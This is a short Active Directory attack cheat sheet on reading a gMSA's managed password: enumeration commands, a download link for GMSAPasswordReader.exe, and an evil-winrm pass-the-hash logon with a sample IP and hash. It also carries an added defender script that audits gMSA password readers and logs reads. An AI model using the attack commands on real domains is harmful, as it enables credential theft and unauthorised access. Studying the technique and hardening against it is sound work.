GMSA password retrieval

Reference: Reading GMSA Password

Enumeration

# Target machine
# List domain users and look for any service accounts
PS> net users /domain

# Check the properties of svc_apache
PS> Get-ADServiceAccount -Identity 'svc_apache$' -Properties *

# List which principals are allowed to retrieve the managed password
PS> Get-ADServiceAccount -Identity 'svc_apache$' -Properties * | Select PrincipalsAllowedToRetrieveManagedPassword

# Check whether the current user can read the managed password blob (msDS-ManagedPassword)
PS> Get-ADServiceAccount -Identity 'svc_apache$' -Properties 'msDS-ManagedPassword'
PS> $gmsa = Get-ADServiceAccount -Identity 'svc_apache$' -Properties 'msDS-ManagedPassword'
PS> $mp = $gmsa.'msDS-ManagedPassword'
PS> $mp
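The enumeration above checks a single gMSA by hand. The following added example (not from the original page or from any of the tools it references) is a defender-side audit of the same attribute across the whole domain: it reports every principal listed in PrincipalsAllowedToRetrieveManagedPassword for each gMSA, flags broad groups whose members would all be able to read the password, and optionally adds a SACL so that reads of msDS-ManagedPassword are logged as Directory Service Access events (event ID 4662). It assumes the ActiveDirectory RSAT module is installed, the AD: PSDrive is available, and the caller has read access to the gMSA objects (and SeSecurityPrivilege for the SACL step). The set of "broad" SIDs and the function names are this example's own choices.

```powershell
# Added example (not the page's own code): domain-wide audit of gMSA password readers.
Import-Module ActiveDirectory

# Principals treated as "broad" (assumption of this example): Everyone, Authenticated Users,
# BUILTIN\Users, and the domain's Domain Users (RID 513) / Domain Computers (RID 515).
$BroadSids = @('S-1-1-0', 'S-1-5-11', 'S-1-5-32-545')
$BroadRids = @('513', '515')

function Test-BroadSid {
    param([string]$Sid)
    if ($BroadSids -contains $Sid) { return $true }
    return ($Sid -match '^S-1-5-21-[\d-]+-(' + ($BroadRids -join '|') + ')$')
}

function Get-GmsaPasswordReaders {
    # One row per (gMSA, reader) pair; gMSAs with no readers are reported too.
    Get-ADServiceAccount -Filter * -Properties PrincipalsAllowedToRetrieveManagedPassword |
        Where-Object { $_.ObjectClass -eq 'msDS-GroupManagedServiceAccount' } |
        ForEach-Object {
            $gmsa    = $_
            $readers = @($gmsa.PrincipalsAllowedToRetrieveManagedPassword)
            if ($readers.Count -eq 0) {
                [pscustomobject]@{ GMSA = $gmsa.SamAccountName; Reader = '<none>'; ReaderClass = ''; ReaderSid = ''; Broad = $false }
            }
            foreach ($dn in $readers) {
                # Resolve the DN so the report shows a name, class and SID rather than a DN
                $obj = Get-ADObject -Identity $dn -Properties sAMAccountName, objectSid
                $sid = if ($obj.objectSid) { $obj.objectSid.Value } else { '' }
                [pscustomobject]@{
                    GMSA        = $gmsa.SamAccountName
                    Reader      = if ($obj.sAMAccountName) { $obj.sAMAccountName } else { $obj.Name }
                    ReaderClass = $obj.ObjectClass
                    ReaderSid   = $sid
                    Broad       = Test-BroadSid -Sid $sid
                }
            }
        }
}

function Enable-GmsaPasswordReadAudit {
    # Adds a success-audit ACE for ReadProperty on msDS-ManagedPassword to each gMSA object.
    # Event 4662 is only generated if "Audit Directory Service Access" is enabled in the audit policy.
    param([switch]$Apply)

    $schemaNc = (Get-ADRootDSE).schemaNamingContext
    $attr     = Get-ADObject -SearchBase $schemaNc -Filter "lDAPDisplayName -eq 'msDS-ManagedPassword'" -Properties schemaIDGUID
    $attrGuid = [guid]::new([byte[]]$attr.schemaIDGUID)

    Get-ADServiceAccount -Filter * |
        Where-Object { $_.ObjectClass -eq 'msDS-GroupManagedServiceAccount' } |
        ForEach-Object {
            $path = "AD:\$($_.DistinguishedName)"
            $acl  = Get-Acl -Path $path -Audit
            $rule = New-Object System.DirectoryServices.ActiveDirectoryAuditRule(
                [System.Security.Principal.SecurityIdentifier]'S-1-1-0',        # audit reads by anyone
                [System.DirectoryServices.ActiveDirectoryRights]::ReadProperty,
                [System.Security.AccessControl.AuditFlags]::Success,
                $attrGuid)
            $acl.AddAuditRule($rule)
            if ($Apply) { Set-Acl -Path $path -AclObject $acl } else { Write-Host "Would audit reads of msDS-ManagedPassword on $($_.SamAccountName)" }
        }
}

# Report, with broad readers first so they stand out
Get-GmsaPasswordReaders | Sort-Object -Property @{Expression = 'Broad'; Descending = $true}, GMSA | Format-Table -AutoSize

# Dry run of the SACL change; re-run with -Apply to commit it
Enable-GmsaPasswordReadAudit
```

Any row with Broad = True means that every member of that group can retrieve the gMSA password exactly as the enumeration above does, so the fix is to narrow PrincipalsAllowedToRetrieveManagedPassword to the specific computer accounts that run the service. With the SACL in place, a 4662 event whose object is the gMSA and whose property GUID is that of msDS-ManagedPassword, coming from an account that is not one of the expected hosts, is the signal to alert on.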

Get Password Hash

# https://github.com/CsEnox/tools/raw/main/GMSAPasswordReader.exe

PS> ./GMSAPasswordReader.exe --accountname svc_apache

Logon to the target machine

# WinRM example: pass-the-hash with the NTLM hash obtained in the previous step
evil-winrm -i 192.168.174.165 -u 'svc_apache$' -H 41BCD07B8CC9636826FE07FF9539CA57
